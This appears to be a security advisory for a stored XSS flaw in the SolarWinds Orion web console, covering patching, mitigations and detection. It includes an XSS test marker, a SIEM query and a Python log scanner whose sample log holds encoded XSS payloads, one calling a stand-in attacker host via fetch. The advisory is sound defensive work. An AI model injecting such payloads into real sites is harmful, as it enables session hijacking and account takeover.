CVE-2020-13169
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in SolarWinds Orion Platform before 2020.2.1 lets an attacker plant malicious script in multiple forms and pages of the Orion web console. The script then runs in the browser of any user who later views the affected page, including administrators, so exploitation can lead to information disclosure and privilege escalation up to administrator account takeover. Any organization running an Orion Platform version earlier than 2020.2.1 is affected.
💻 Affected Systems
- SolarWinds Orion Platform (versions before 2020.2.1)
📦 What is this software?
SolarWinds Orion Platform is the shared web console, database and polling framework underneath SolarWinds' infrastructure monitoring products (NPM, SAM, NCM and others). Its web console is where the affected forms and pages live.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the SolarWinds Orion environment: an attacker who hijacks an administrator session can take over accounts, exfiltrate everything Orion holds about the monitored estate (inventories, topology, stored polling credentials), and use that foothold to move laterally to the systems Orion manages.
Likely Case
Session hijacking or credential theft from users who view the poisoned page, giving the attacker that user's level of access to monitoring data and network information.
If Mitigated
Limited impact once 2020.2.1 is applied (the vendor fix supplies the missing input validation and output encoding); network isolation, least-privilege console accounts and a Content Security Policy reduce exposure further.
🎯 Exploit Status
Injecting the payload requires an Orion console account with rights to edit the affected fields, so an attacker first needs some level of authenticated access. Once stored, the script executes in the browser of every user who views the page, administrators included, and no tooling beyond a browser is needed; that is what turns a low-privileged account into administrator access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2020.2.1 or later
Vendor Advisory: https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-1_release_notes.htm
Restart Required: Yes
Instructions:
1. Download SolarWinds Orion Platform 2020.2.1 or later from the SolarWinds customer portal.
2. Back up the current configuration and the Orion database.
3. Run the installer with administrative privileges.
4. Follow the upgrade wizard.
5. Restart Orion services after installation completes.
🔧 Temporary Workarounds
Input Validation and Output Encoding
Strict input validation and context-aware output encoding of user-controllable fields is what the 2020.2.1 fix delivers. Operators cannot change how the Orion console renders its own pages, so treat this as the reason to patch rather than as a control you can apply yourself.
Content Security Policy
Add a Content Security Policy header on the IIS site that hosts the Orion web console. Roll it out as Content-Security-Policy-Report-Only first: a policy strict enough to block injected inline script will also block the console's own inline scripts unless they carry nonces or hashes, which you cannot add to vendor pages, so review the reports before enforcing.
🧯 If You Can't Patch
- Isolate SolarWinds Orion servers from internet access and restrict internal access to authorized users only.
- Reduce the number of accounts that can edit objects in the console; a stored XSS payload has to be written by someone with rights to the affected fields.
- Implement web application firewall (WAF) rules to detect and block XSS payloads targeting Orion endpoints. The payload is submitted through legitimate forms by an authenticated user, so the rules must inspect POST bodies and URL-decoded parameters, not just the URL.
🔍 How to Verify
Check if Vulnerable:
Compare the Orion Platform version shown in the web console (Settings > All Settings > Product Information, or the footer of any console page) against 2020.2.1. Anything earlier is vulnerable.
Check Version:
There is no command-line version check; use the web console as above or the SolarWinds Orion Configuration Wizard.
Verify Fix Applied:
Confirm the version is 2020.2.1 or later. Then, in a non-production instance, store a harmless marker such as "><img src=x onerror=alert(document.domain)> in a form field that is later displayed and confirm it is rendered as literal text (HTML-encoded in the page source) rather than executed.
📡 Detection & Monitoring
Log Indicators:
- POST requests to Orion console forms whose parameters contain script tags, event-handler attributes (onload=, onerror=) or javascript: URIs, including their URL-encoded forms
- An administrator session used from a new source IP or User-Agent shortly after another user viewed a recently edited page (a hijacked session)
Network Indicators:
- HTTP requests containing script tags or JavaScript to Orion endpoints
- Outbound connections from administrators' browsers to unknown external hosts right after loading Orion console pages (a payload calling home). The XSS runs in the viewer's browser, not on the Orion server, so outbound connections from the server itself indicate a later stage of compromise rather than the XSS.
SIEM Query:
source="orion_logs" AND (http_request="*<script>*" OR http_request="*%3Cscript*" OR http_request="*javascript:*" OR http_request="*onload=*" OR http_request="*onerror=*")
This matches literal strings only. URL-decode the request field before matching, or encoded and double-encoded variants slip through, and remember that IIS access logs do not record POST bodies, which is where stored-XSS payloads are usually submitted.
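The decoding caveat above, applied to constructed log lines, as an added example for this advisory (not SolarWinds code and not a SolarWinds-supplied detection). It assumes the Orion console's IIS site writes W3C-format logs, the IIS default, and that console pages sit under /Orion/; the field layout, paths and addresses are constructed for the example. It percent-decodes the query string repeatedly before matching, so %3Cscript%3E and double-encoded %253C... payloads are caught, and it deliberately cannot see the POST whose payload travelled in the request body:

```python
"""Flag web-server log entries carrying XSS indicators aimed at Orion endpoints.

Added example for this advisory, not SolarWinds code. Assumptions: the Orion
web console's IIS site writes W3C-format logs (the IIS default) and console
pages live under /Orion/. The log lines below are constructed, not captured.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample. Note the POST on the third record: IIS logs the query
# string but not the request body, so a payload submitted through a form is
# invisible here. Pair this with WAF or reverse-proxy logs that keep bodies.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2020-06-15 10:01:02 GET /Orion/SummaryView.aspx - 10.0.0.5 200
2020-06-15 10:01:09 GET /Orion/NetPerfMon/NodeDetails.aspx NetObject=N:12 10.0.0.5 200
2020-06-15 10:02:33 POST /Orion/Admin/Accounts/EditAccount.aspx - 10.0.0.77 302
2020-06-15 10:02:41 GET /Orion/View.aspx ViewID=1&q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E 10.0.0.77 200
2020-06-15 10:03:10 GET /Orion/View.aspx ViewID=1&t=%253Cimg%2520src%253Dx%2520onerror%253Dfetch(%27//attacker%27)%253E 10.0.0.77 200
2020-06-15 10:04:00 GET /Orion/NetPerfMon/CustomChart.aspx href=javascript%3Aalert(1) 10.0.0.77 200
2020-06-15 10:05:00 GET /Orion/Login.aspx ReturnUrl=%2fOrion%2fSummaryView.aspx 10.0.0.9 200
2020-06-15 10:05:30 GET /css/site.css v=%3Cscript%3E 10.0.0.9 200
"""

# Indicators are checked after decoding; a literal-string SIEM match misses
# %3Cscript%3E and the double-encoded %253C... form used in the sample.
XSS_PATTERNS = [
    (re.compile(r"<\s*script\b", re.I), "script-tag"),
    (re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I), "html-injection-tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "event-handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript-uri"),
]


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def find_xss_indicators(text, path_prefix="/Orion/"):
    """Return records under path_prefix whose decoded query matches an indicator."""
    hits = []
    for rec in parse_w3c(text):
        if path_prefix and not rec["cs-uri-stem"].startswith(path_prefix):
            continue
        query = rec.get("cs-uri-query", "-")
        if query == "-":  # no query string; a body payload would not be logged
            continue
        decoded = decode_fully(query)
        labels = [label for rx, label in XSS_PATTERNS if rx.search(decoded)]
        if labels:
            hits.append({
                "ip": rec["c-ip"],
                "method": rec["cs-method"],
                "path": rec["cs-uri-stem"],
                "indicators": labels,
                "decoded_query": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in find_xss_indicators(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["path"], hit["indicators"])
```

Run against the sample it reports three requests from 10.0.0.77 (the plain script tag, the double-encoded img/onerror payload and the javascript: URI) and nothing for the POST to EditAccount.aspx, which is the gap that body-logging at the WAF or proxy has to close.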
🔗 References
- https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-1_release_notes.htm#NewFeaturesOrion
- https://support.solarwinds.com/SuccessCenter/s/